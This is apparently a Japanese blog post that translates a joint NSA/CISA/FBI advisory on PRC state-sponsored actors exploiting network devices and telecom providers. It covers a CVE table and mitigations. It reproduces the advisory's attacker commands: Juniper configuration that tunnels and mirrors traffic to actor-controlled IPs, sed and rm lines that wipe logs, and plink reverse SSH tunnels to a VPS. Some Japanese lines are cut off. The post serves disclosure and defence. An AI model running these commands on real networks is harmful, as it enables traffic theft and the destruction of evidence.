興味深い「出典」記事を日本語化してみた。
「ベストプラクティス」や「緩和策」に書かれているのは、基本的な(やっていて当然な)対策ばかりである。しかしながら実施する立場に居ると、リソース不足などを理由に、出来ない言い訳をしたくもなりそうだ。自組織での取り組みの方針・手順が定められているか、それに則りリスク評価したか、リスク評価に基づき対策実施すべきだが、実施できない場合はリスクを許容できるのか(組織責任者の決裁が得られるか)、という視点で読むと気づきも多い。
Summary 概要
Best Practices ベストプラクティス
- Apply patches as soon as possible
- Disable unnecessary ports and protocols
- Replace end-of-life infrastructure
- Implement a centralized patch management system
- できるだけ早くパッチを適用する
- 不要なポートやプロトコルを無効化する
- 耐用年数が経過したインフラをリプレースする
- 集中型パッチ管理システムを導入する
この共同サイバーセキュリティ勧告では、中華人民共和国(PRC)の国家に支援されたサイバー行為者が、侵害されたインフラの広範なネットワークを確立するために、公に知られた脆弱性を悪用し続ける方法について説明します。これらのサイバー攻撃者は、このネットワークを利用して、公共機関や民間企業を含む世界中のさまざまな標的を攻撃しています。本アドバイザリーでは、大手通信事業者やネットワークサービスプロバイダーが標的とされ、侵害されたこと、および2020年以降サイバー行為者によって日常的に悪用されているネットワーク機器に関連するトップの脆弱性(主にCommon Vulnerabilities and Exposures(CVEs))について詳述しています。
この共同サイバーセキュリティ勧告は、国家安全保障局(NSA)、サイバーセキュリティおよびインフラセキュリティ局(CISA)、連邦捜査局(FBI)が共同で作成したものです。この報告書は、これまでの NSA、CISA、FBI の報告を基に、連邦政府および州・地方・部族・準州(SLTT)政府、防衛産業基盤(DIB)を含む重要インフラ(CI)、民間企業に対し、注目すべき傾向と根強い戦術・技術・手順(TTPs)に関する情報を提供するものです。
この勧告に記載されている脆弱性を緩和するには、利用可能なパッチをシステムに適用し、耐用年数が経過したインフラを交換し、集中パッチ管理プログラムを導入する必要があります。
NSA、CISA、FBI は、米国および同盟国の政府、情報収集機関、民間企業組織が、「緩和策」のセクションおよび「付録 A:脆弱性」に記載された推奨事項を適用して防御体制を強化し、PRC 国家支援による悪質なサイバー行為者が重要ネットワークに影響を及ぼすリスクを低減することを強く推奨します。
中国がスポンサーとなっている悪質なサイバー活動の詳細については、CISAのChina Cyber Threat Overview and Advisoriesウェブページを参照してください。
Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors 中華人民共和国の国家が支援するサイバーアクターが悪用する一般的な脆弱性
中国が支援するサイバー・アクターは、脆弱性を悪用して、パッチの適用されていないネットワーク・デバイスを容易に危険にさらすことができます。スモールオフィス/ホームオフィス(SOHO)ルーターやネットワーク接続ストレージ(NAS)デバイスなどのネットワークデバイスは、コマンド&コントロール(C2)トラフィックを転送するための追加のアクセスポイントとして機能し、他のエンティティにネットワーク侵入を行うための中間点として機能します。ここ数年、ネットワーク機器に深刻度の高い脆弱性が相次いで発見され、サイバー攻撃者は、脆弱なインフラ機器を定期的に悪用してアクセスする能力を身につけました。さらに、これらのデバイスは、インターネットに面したサービスやエンドポイントデバイスの定期的なソフトウェアパッチを維持し、ペースを保つことに苦労しているサイバーディフェンダーによって見過ごされがちです。
2020年以降、中国が支援するサイバーアクターは、一般に特定されたセキュリティ脆弱性(CVEs)を迅速に悪用するキャンペーンを広く行っています。この手法により、サイバー犯罪者は、被害者組織がシステムを更新する前に行動する限り、独自の特徴やマルウェアを特定することなく、仮想プライベートネットワーク(VPN)サービス[T1133]や公共向けアプリケーション[T1190]に対して公開されている悪用コードを使用して、被害者のアカウントにアクセスすることができました。
中国の国家に支援されたサイバー攻撃者は、通常、中国のインターネット・サービス・プロバイダー(ISP)に解決される多数の中国ベースのIPアドレスからホップポイントと呼ばれる危険なサーバにアクセスすることによって、侵入を実行します。サイバー攻撃者は通常、ホスティングプロバイダーから直接または間接的にリモートアクセスをリースすることで、サーバーの利用権を取得します。彼らはこれらのサーバを使用して、業務用電子メールアカウントの登録とアクセス、C2ドメインのホスト、および被害者ネットワークとのやり取りを行います。サイバー攻撃者は、被害者ネットワークと対話する際に、これらのホップポイントを難読化技術として使用します。
また、これらのサイバー攻撃者は、防御を回避するための戦術を常に進化させ、適応させています。NSA、CISA、FBIは、国家に支援されたサイバー行為者がネットワーク防御者のアカウントと行動を監視し、必要に応じて進行中のキャンペーンを修正し、検知されないようにしていることを確認しています。サイバー攻撃者は、進行中のキャンペーンに関連する情報が公開されると、直ちにそのインフラとツールセットを修正しました。中国の国家に支援されたサイバー攻撃者は、カスタマイズしたツールセットと一般に入手可能なツール、特にネットワーク環境にネイティブなツールを混合し、ネットワークのノイズや通常の活動に紛れ込ませることで活動を不明瞭にすることがよくあります。
NSA、CISA、FBIは、表1に示す共通脆弱性公表(CVE)を、2020年以降にPRC国家支援型サイバー行為者によって最も頻繁に悪用されたネットワークデバイスCVEであるとみなしています。
Vendor CVE CVSS / Vulnerability Type | ||
Cisco | 9.8 Critical / RCE(*1) | |
8.8 High / RCE | ||
CVE-2019-1652 | 7.2 High / RCE | |
Citrix | 9.8 Critical / RCE | |
DrayTek | CVE-2020-8515 | 9.8 Critical / RCE |
D-Link | 9.8 Critical / RCE | |
Fortinet | 7.5 High (->NIST, 9.1->CNA) / Auth. Bypass | |
MikroTik | CVE-2018-14847 | 9.1 Critical / Auth. Bypass |
Netgear | 9.8 Critical / RCE | |
Pulse | 10.0 Critical / Auth. Bypass | |
10.0 Critical / RCE | ||
QNAP | 9.8 Critical / Privilege Elevation | |
CVE-2019-7193 | 9.8 Critical / Remote Inject | |
CVE-2019-7194 | 9.8 Critical / XML Routing Detour Attack | |
CVE-2019-7195 | 9.8 Critical / XML Routing Detour Attack | |
Zyxel | CVE-2020-29583 | 9.8 Critical / Auth. Bypass |
*1 RCE = Remote Code Execution
Telecommunications and network service provider targeting 通信事業者、ネットワークサービス事業者の標的化
中国国家が支援するサイバーアクターは、偵察と脆弱性スキャンのためにオープンソースのツールを頻繁に利用します。この行為者は、オープンソースのルーター専用ソフトウェアフレームワークである RouterSploit および RouterScan [T1595.002] を利用して、さらなる調査や悪用に向けてメーカー、モデル、および既知の脆弱性を特定しています。RouterSploitフレームワークは、組み込みデバイスに特化したオープンソースのエクスプロイトフレームワークです。RouterScanは、IPアドレスの脆弱性を簡単にスキャンできるオープンソースのツールです。これらのツールにより、Cisco、Fortinet、MikroTikなど、業界の主要プロバイダが製造するSOHOなどのルータを悪用することができます。
通信事業者やネットワーク・サービス・プロバイダへの侵入の足がかりとして、中国が支援するサイバー・アクターは、認証、認可、アカウンティングのセキュリティを維持するために重要なシステムを含む重要なユーザーとインフラを特定します。重要なリモート認証ダイヤルインユーザーサービス(RADIUS)サーバーを特定した後、サイバーアクターは、基盤となる構造化クエリー言語(SQL)データベースにアクセスする認証情報を取得し [T1078]、SQLコマンドを利用して、ユーザーおよび管理アカウントの平文およびハッシュ化されたパスワードの両方を含む認証情報 [T1555] を吐き出しました。
RADIUSサーバから認証情報を取得したPRCの国営サイバーアクターは、これらの認証情報をカスタム自動スクリプトで使用し、Secure Shell(SSH)を介してルータに認証し、ルータのコマンドを実行し、その出力を保存しました[T1119]。これらのスクリプトは、CiscoおよびJuniperルータを標的とし、各ルータの現在の設定を含む、実行されたコマンドの出力を保存しました。コマンド出力のキャプチャに成功した後、これらのコンフィギュレーションは、ネットワーク外の行為者のインフラストラクチャに流出しました[TA0010]。サイバー攻撃者は、ルータやスイッチが多数存在する中規模から大規模の被害者ネットワークをさらに自動化するために、追加のスクリプトを使用して、ネットワーク内のトラフィックをうまく操作するために必要なルータの設定を大量に収集していたと思われます。
Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure.
サイバーアクターは、侵害された RADIUS サーバーから有効なアカウントと認証情報、およびルーターの設定情報を入手してネットワークに戻り、そのアクセスと知識を利用して、ルーターで認証成功し、ルーターのコマンドを実行し、[T1599]を密かにルーティングし、[T1020.001]をキャプチャして、ネットワークからアクターの管理するインフラにトラフィックを流し込むことに成功しました。
While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:
他のメーカーにも同様のコマンドがあると思われますが、サイバーアクターは、Juniperルーターで以下のコマンドを実行し、最終的にネットワークから流出させるための初期トンネル設定を行いました。
set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>
set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.
サイバーアクターは、トンネルを確立した後、
set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>
set routing-options static route <local network IP address> next-hop <actor controlled IP address>
PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure.
その後、
set firewall family inet filter <filter name> term <filter variable> then port-mirror
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.
サイバー攻撃者は、設定の変更を完了した後、
sed -i -e '/<REGEX>/d' <log filepath 1>
sed -i -e '/<REGEX>/d' <log filepath 2>
sed -i -e '/<REGEX>/d' <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.
また、中国の国家に支援されたサイバーアクターは、PuTTY Link(Plink)
plink.exe –N –R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>
plink.exe –N –R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
Mitigations .. 緩和策
NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:
NSA、CISA、および FBI は、以下の推奨事項、および、
- Keep systems and products updated and patched as soon as possible after patches are released [D3-SU] . Consider leveraging a centralized patch management system to automate and expedite the process.
- Immediately remove or isolate suspected compromised devices from the network [D3-ITF] [D3-OTF].
- Segment networks to limit or block lateral movement [D3-NI].
- Disable unused or unnecessary network services, ports, protocols, and devices [D3-ACH] [D3-ITF] [D3-OTF].
- Enforce multifactor authentication (MFA) for all users, without exception [D3-MFA].
- Enforce MFA on all VPN connections [D3-MFA]. If MFA is unavailable, enforce password complexity requirements [D3-SPP].
- Implement strict password requirements, enforcing password complexity, changing passwords at a defined frequency, and performing regular account reviews to ensure compliance [D3-SPP].
- Perform regular data backup procedures and maintain up-to-date incident response and recovery procedures.
- Disable external management capabilities and set up an out-of-band management network [D3-NI].
- Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal network [D3-NI].
- Enable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA] [D3-PM].
- Ensure that you have dedicated management systems [D3-PH] and accounts for system administrators. Protect these accounts with strict network policies [D3-UAP].
- Enable robust logging and review of network infrastructure accesses, configuration changes, and critical infrastructure services performing authentication, authorization, and accounting functions [D3-PM].
- Upon responding to a confirmed incident within any portion of a network, response teams should scrutinize network infrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective actions commensurate with their findings.
- パッチがリリースされたら、
できるだけ早くシステムおよび製品を更新し、パッチを適用する [D3-SU] 。このプロセスを自動化し、迅速化するために、 集中型パッチ管理システムの活用を検討する。 - 侵害された疑いのあるデバイスをネットワークから直ちに削除また
は隔離する [D3-ITF] [D3-OTF] 。 - ネットワークをセグメント化し、
横方向の動きを制限またはブロックする[D3-NI]。 - 使用されていない、または不要なネットワークサービス、ポート、
プロトコル、デバイスを無効にする [D3-ACH] [D3-ITF] [D3-OTF]. - すべてのユーザーに対して例外なく多要素認証(MFA)
を強制する [D3-MFA]。 - すべてのVPN接続でMFAを強制する[D3-MFA]。MFA が利用できない場合、パスワードの複雑さの要件を強制する [D3-SPP]。
- 厳格なパスワード要件を実装し、パスワードの複雑さを強制し、
決められた頻度でパスワードを変更し、 定期的にアカウントレビューを行い、コンプライアンスを確保する [D3-SPP]. - 定期的にデータのバックアップ手順を実行し、
最新のインシデント対応と復旧手順を維持する。 - 外部管理機能を無効にし、帯域外管理ネットワークを設定する [D3-NI] 。
- 内部ネットワークの露出を減らすために、
ネットワーク非武装化ゾーン(DMZ) でインターネットに面したサービスを隔離する [D3-NI]. - インターネット向けサービスの堅牢なログを有効にし、
ログに危険の兆候がないか監視する [D3-NTA] [D3-PM] 。 - 専用の管理システム[D3-PH]とシステム管理者用のアカウン
トを確実に用意する。 これらのアカウントは厳格なネットワークポリシーで保護する [D3-UAP]。 - ネットワークインフラへのアクセス、構成変更、および認証、
承認、 アカウンティング機能を実行する重要なインフラサービスの堅牢な ログとレビューを可能にする[D3-PM]。 - ネットワークの一部で確認されたインシデントに対応する際、
対応チームはネットワークインフラへのアクセスを精査し、 ネットワークインフラへの潜在的な横方向の動きを評価し、 発見内容に見合った是正措置を実行する必要があります。
Ref. (出典)
Alert (AA22-158A)
People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices
Original release date: June 07, 2022
https://www.cisa.gov/uscert/
参考
CISA Alert (AA22-158A) 中華人民共和国に支援されたサイバー犯罪者がネットワークプロバイダーやデバイスを悪用している (2022.06.07)
http://maruyama-mitsuhiko.cocolog-nifty.com/security/2022/06/post-789533.html
No comments:
Post a Comment